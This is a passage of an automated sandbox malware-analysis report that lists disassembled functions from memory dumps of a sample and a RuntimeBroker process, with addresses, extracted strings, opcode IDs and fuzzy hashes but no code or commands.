                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab480000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFAAB4A25E0 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab4a1000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFAAB4A7700 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab4a1000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction ID: 0b4c1ba5f4c3e8568460a917849240ee7d11210dce756e12cf07391d85ff6013
                                                                      • Opcode Fuzzy Hash: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction Fuzzy Hash: 02D01234B619044F870CA738885987477D1EB6A216B9540ADD00AC72B1D96ADC99C781
                                                                      Function 00007FFAAB470B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: 5d6e81b34bc9f67479e3927315d3e938a9b7610a88fad50f39688fefc833bcb4
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: D3D012345768498FC650E728D9954A4BB90FB0A214F8901D0D40CC7161D3569894C741
                                                                      Function 00007FFAAB4706A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: 9182ade74973473efd9a91cb18fcff3fe863572f8a8b4ccf94988b8c2aa409b5
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: DEC08C00E0B40B83B810B33E14120ACA9006BC7290FD08032C10C802E19C4E20DD81C6
                                                                      Function 00007FFAAB4712B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 43e346325f29e7365e5b0cbc07af6b3bfadc9982b9ec397910975f9166f44ce6
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: A0C04C345519498FC948EB29C88591477A0FB1A215BD600D0E40DC7171D659DCD5C781
                                                                      Function 00007FFAAB473416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f8c085fb0c8fb1a2020a152b44ac9d6eb9c857a7e5c6a79d6d7085cde9654f96
                                                                      • Instruction ID: 192cd16011e878bcde43d113d3d164ad57f4869502be93d4cd0e058b32b7c522
                                                                      • Opcode Fuzzy Hash: f8c085fb0c8fb1a2020a152b44ac9d6eb9c857a7e5c6a79d6d7085cde9654f96
                                                                      • Instruction Fuzzy Hash: 80C08C02F08CAA87F214A228C02163F00929F80A48F8004B0E00DC63C6CC0C6B0112C2
                                                                      Function 00007FFAAB473A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: 6db26826a2423f8c86332fdba027ea285eabc923419afa289c2718a17ee9d05b
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 83C02B10C0E004C3E329873044051FD31401F5A300F05C172C00E52091DE28244C91C0
                                                                      Function 00007FFAAB4706C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: a5735ffe0b8818d5644c87d865a7e8281c1521c7f2e206bd483853161b9d9d55
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: 72B01200C5740F42A814337E0842064B8505B46140FC04070D40C501D5984E10EC42C3

                                                                      Non-executed Functions

                                                                      Function 00007FFAAB4709B0 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 695407360afe483742a26e70f6642c61ef3d3130ff1df29031e4ccb588e4268e
                                                                      • Instruction ID: 40cae4d5181ea78131fe2c0bbc18da0b7c6517f1a69a3b279efe9b1d56bf911b
                                                                      • Opcode Fuzzy Hash: 695407360afe483742a26e70f6642c61ef3d3130ff1df29031e4ccb588e4268e
                                                                      • Instruction Fuzzy Hash: 1351D34BB4942376E11237FCF40A8FC6BA8EFD1376B494AB7D04DC91934D0968C582E5

                                                                      Executed Functions

                                                                      Function 00007FFAAB470D4C Relevance: 6.5, Strings: 5, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5X_H$b43$r63$r63
                                                                      • API String ID: 0-1044410338
                                                                      • Opcode ID: b71b67af06f7279711d3073da40d0cb9e2079f4af7af2b37b505f8609fb29919
                                                                      • Instruction ID: 20020ed3a93b9dd39139a8ccac5192dcb62b040b329c46ffcfbb3b65a23a24bb
                                                                      • Opcode Fuzzy Hash: b71b67af06f7279711d3073da40d0cb9e2079f4af7af2b37b505f8609fb29919
                                                                      • Instruction Fuzzy Hash: 409116B6A19A898FE785DB68C8657B97FE1FB96750F4040BAC04DC73E2CB781414C780
                                                                      Function 00007FFAAB4A1715 Relevance: 4.6, Strings: 3, Instructions: 896COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I$X6$r63
                                                                      • API String ID: 0-1713481558
                                                                      • Opcode ID: 158ada4ce9d8af87824cef7570175aa02414159b1a602b3d4f21724226f59c86
                                                                      • Instruction ID: 6f11a3c073d808c79fbe826ef0ac8ff1319301caee8d47319beaed9421e170f5
                                                                      • Opcode Fuzzy Hash: 158ada4ce9d8af87824cef7570175aa02414159b1a602b3d4f21724226f59c86
                                                                      • Instruction Fuzzy Hash: 12127C6191E7964FE31D9B2888451B57BE1EF93395F0882BED4CFC70A7D918A84B83C1
                                                                      Function 00007FFAAB4A1958 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: e90af64e832f0eb52b5653c1f6c46c3a1258e7fd9341d140b7414552f5ba05ed
                                                                      • Instruction ID: 0c8775cf3bf3b0d36fe44203406054e388540fff618a24e28ff64c0bad35fb47
                                                                      • Opcode Fuzzy Hash: e90af64e832f0eb52b5653c1f6c46c3a1258e7fd9341d140b7414552f5ba05ed
                                                                      • Instruction Fuzzy Hash: CD819C62E2D6564BE31C4A2D4C420B273D6EBC7291B18C23DD9CFC7197DC18E84B42C0
                                                                      Function 00007FFAAB4A2CB6 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 26ce7640e99e355d2a69086d5e991eeacafb0472cf8366a0ffbf0543e910c22c
                                                                      • Instruction ID: 0015b20122db8bc5fe8660311c1e4ef279d1abd9d5fde6c4edc7618e11316b3f
                                                                      • Opcode Fuzzy Hash: 26ce7640e99e355d2a69086d5e991eeacafb0472cf8366a0ffbf0543e910c22c
                                                                      • Instruction Fuzzy Hash: 4141A132B0C91ACFDB58E758C494BB977A2FB99750F0442BDD00ED7296CE286C8987C1
                                                                      Function 00007FFAAB4A5494 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63
                                                                      • API String ID: 0-3819469774
                                                                      • Opcode ID: f1124fae8d91ae2085275b741caee2eedc233b6790ccc7059bed4c3271301f18
                                                                      • Instruction ID: 03748351dbb87a52fad9162cc3daaa62fb94c25ec647731e212dcf9540fead4a
                                                                      • Opcode Fuzzy Hash: f1124fae8d91ae2085275b741caee2eedc233b6790ccc7059bed4c3271301f18
                                                                      • Instruction Fuzzy Hash: A2214FB1A199598FE798EB28C8567F8B7E2FFA9340F4081F9D04DC3192DD246DC58B80
                                                                      Function 00007FFAAB4ADF06 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8e=
                                                                      • API String ID: 0-1240725123
                                                                      • Opcode ID: 36026f489d406f9abedf9a237902e6faa5b4738c6858f37fd87627a17a2c310a
                                                                      • Instruction ID: 168ad394b7a7339ad91ab81b0ba22955f196c4fd77b2b1f20d07cacd1693b4cc
                                                                      • Opcode Fuzzy Hash: 36026f489d406f9abedf9a237902e6faa5b4738c6858f37fd87627a17a2c310a
                                                                      • Instruction Fuzzy Hash: 5901DF72F0881A8BEB94E668C4453FE73E1EFA5351F00857AE00DC3180DE39A8D88BC0
                                                                      Function 00007FFAAB4A37C9 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 2fe0314b4c5b8fb04c075162796d421f202d4d1f0ae38499fc8cf39607c9739c
                                                                      • Instruction ID: da5124056a5a1441d69587253394755c1a6cc5c19eb998d3cec7c8364aba0433
                                                                      • Opcode Fuzzy Hash: 2fe0314b4c5b8fb04c075162796d421f202d4d1f0ae38499fc8cf39607c9739c
                                                                      • Instruction Fuzzy Hash: 0DF0E56050E7C04FD71AAA3888684517F60EF2720134A51EFC045CF1E3EA1D9C88C751
                                                                      Function 00007FFAAB4AAC59 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: e0eef9e470ed1d7376f3f0d47bf58c449a7170354a1bfd231a2bcd963843efe5
                                                                      • Instruction ID: 6346f2d0c8277944c8ac119b490cd5c713f6fead768bfe80e875000dc36c075f
                                                                      • Opcode Fuzzy Hash: e0eef9e470ed1d7376f3f0d47bf58c449a7170354a1bfd231a2bcd963843efe5
                                                                      • Instruction Fuzzy Hash: 49E0E57190A7C08FD71996388469450BFA0EF6720134941EFC005CF1A3EA1C8885C741
                                                                      Function 00007FFAAB4A2539 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 553c7726822b3674b2e6862713ba67bb1763d0c062fd62fc9fc2c1e9624dbf38
                                                                      • Instruction ID: 08edd8a58410e3d5ac0a2f7f2f7539cd038aa771677b06a2bbbc88962b8d9730
                                                                      • Opcode Fuzzy Hash: 553c7726822b3674b2e6862713ba67bb1763d0c062fd62fc9fc2c1e9624dbf38
                                                                      • Instruction Fuzzy Hash: 25F0657154A7C08FC715DA7484A5855BFA1EF6720174A42EEC045CB1A7DA2DD88ACB41
                                                                      Function 00007FFAAB4AAD29 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: a097cd91fd19cefe6c782fe309e5c85fe2c6142f07b236e297cb266adfb163d4
                                                                      • Instruction ID: 0209a04390b82402521676085ac641e1ed89b47d0b98f01885b0225dc5dc397d
                                                                      • Opcode Fuzzy Hash: a097cd91fd19cefe6c782fe309e5c85fe2c6142f07b236e297cb266adfb163d4
                                                                      • Instruction Fuzzy Hash: 8DF0A07090E7C48FC70A9B3488694547FA0EF6720134A41EEC045CF1A3EA2C8888CB01
                                                                      Function 00007FFAAB4AB229 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 5f2e5726fed607c366d960494fb0e71283661fa3b2a34d3cdc4718f5d1a3f319
                                                                      • Instruction ID: 6785396eca7536b9feba0afb327885453bdd5df6d638b50b173edf18a0b95d42
                                                                      • Opcode Fuzzy Hash: 5f2e5726fed607c366d960494fb0e71283661fa3b2a34d3cdc4718f5d1a3f319
                                                                      • Instruction Fuzzy Hash: 53E0126154A7C04FD705AB7484758547FA0DE6721178A40EEC145CB5B3D61D8849C712
                                                                      Function 00007FFAAB4A25C9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: fbae115273a8061cf60fc8e3930497709ce788878f9ad58f4767502085cd3f87
                                                                      • Instruction ID: 3cb0638c0fa201dc150ebe5deb648b377a2c3e640bed2febe5d649b9482c63f9
                                                                      • Opcode Fuzzy Hash: fbae115273a8061cf60fc8e3930497709ce788878f9ad58f4767502085cd3f87
                                                                      • Instruction Fuzzy Hash: 4EE01A6144F7C48FCB4AEB7488699587FA0AE6721078A41EEC049CF1B3E62E8889C711
                                                                      Function 00007FFAAB4A89A9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 33afa1720f624e43994c15f338f51048f8f96b6492524073cc7a273d63f5b458
                                                                      • Instruction ID: 1d7c58a46372557c3c4d565f8dcf95a1be0a6e412775981ddc79b11a307d61bc
                                                                      • Opcode Fuzzy Hash: 33afa1720f624e43994c15f338f51048f8f96b6492524073cc7a273d63f5b458
                                                                      • Instruction Fuzzy Hash: 95E01A6144F7C44FCB4AEB7488698487FB0EE6725078A40EEC049CF1B3E62E9849C701
                                                                      Function 00007FFAAB4708D0 Relevance: .2, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7afca9b20cc26904101bd20c8038c736a43faecde94c9f8aaf71848f0e5b0fb7
                                                                      • Instruction ID: e137d068d438d23d02ae6facc2f6a5a2fc83b20d9fd53ce8c84dddd3961a9d3b
                                                                      • Opcode Fuzzy Hash: 7afca9b20cc26904101bd20c8038c736a43faecde94c9f8aaf71848f0e5b0fb7
                                                                      • Instruction Fuzzy Hash: D4413E3264C9155FD715EB7CE4899F87BE0EF86321B0509BBD08ACB067DA20AC82C3C1
                                                                      Function 00007FFAAB47090D Relevance: .1, Instructions: 146COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3b903357b4801e17ae7cd2ad9bc0b883f597affdae35743ba0065467cb490184
                                                                      • Instruction ID: 043ea8c293df8a7c5efac75220887512ada407557bb894241f0a18f50f362887
                                                                      • Opcode Fuzzy Hash: 3b903357b4801e17ae7cd2ad9bc0b883f597affdae35743ba0065467cb490184
                                                                      • Instruction Fuzzy Hash: 8D413952A4E6962FE705B77CE09A9F87BD0EF85361B1548FAD04EC71B3DD186882C2C4
                                                                      Function 00007FFAAB470908 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: 2f108efce297fe2c2bc39ef8334c547788e254aae91e9cfa00527482bc055ed3
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: 6521F83130DC184FE768EB0CE889DB973D5EB5A32170101BAE58EC7136E921EC9287C1
                                                                      Function 00007FFAAB470960 Relevance: .1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2873652a3e92e0a001a1ab292671519af0db2624a9c71151d587f9691fc7667c
                                                                      • Instruction ID: 9184acb72e5af1ea98ed0e9e464a2830f0b1c5b004eb19c1483dbd9eeb955f9a
                                                                      • Opcode Fuzzy Hash: 2873652a3e92e0a001a1ab292671519af0db2624a9c71151d587f9691fc7667c
                                                                      • Instruction Fuzzy Hash: 23310662A0EA566FF258B77CE44A9B977D1EF85361B1544FED00EC32E3DC186C8682C4
                                                                      Function 00007FFAAB47116D Relevance: .1, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e918f86a40548bd273ad7ed38a3cef16b5b6b21debaaffae29967ed1648dc29a
                                                                      • Instruction ID: 5394665f11ac6731346f3c3a86d9fc9dc0dc6b38f59db86a06ae544e194cdb17
                                                                      • Opcode Fuzzy Hash: e918f86a40548bd273ad7ed38a3cef16b5b6b21debaaffae29967ed1648dc29a
                                                                      • Instruction Fuzzy Hash: 2531E77190E64ACFEB45EB68C8559B97BF0FF5A300B0445FAD00DD71A2EA29A845C781
                                                                      Function 00007FFAAB470998 Relevance: .1, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 09452cc70fcc8c78ed7b3f35d7dd2478f1e50b5f3cc00c3197ac412111e49ff8
                                                                      • Instruction ID: cf7477953481380e2d0bcc3639b4bf47ed3df9045065cd76644dde8516330aa8
                                                                      • Opcode Fuzzy Hash: 09452cc70fcc8c78ed7b3f35d7dd2478f1e50b5f3cc00c3197ac412111e49ff8
                                                                      • Instruction Fuzzy Hash: 4F31F461B1AA995FE788F738845AA7977D2EF99350B1440FDE40EC32E3DD18AC85C280
                                                                      Function 00007FFAAB470C25 Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
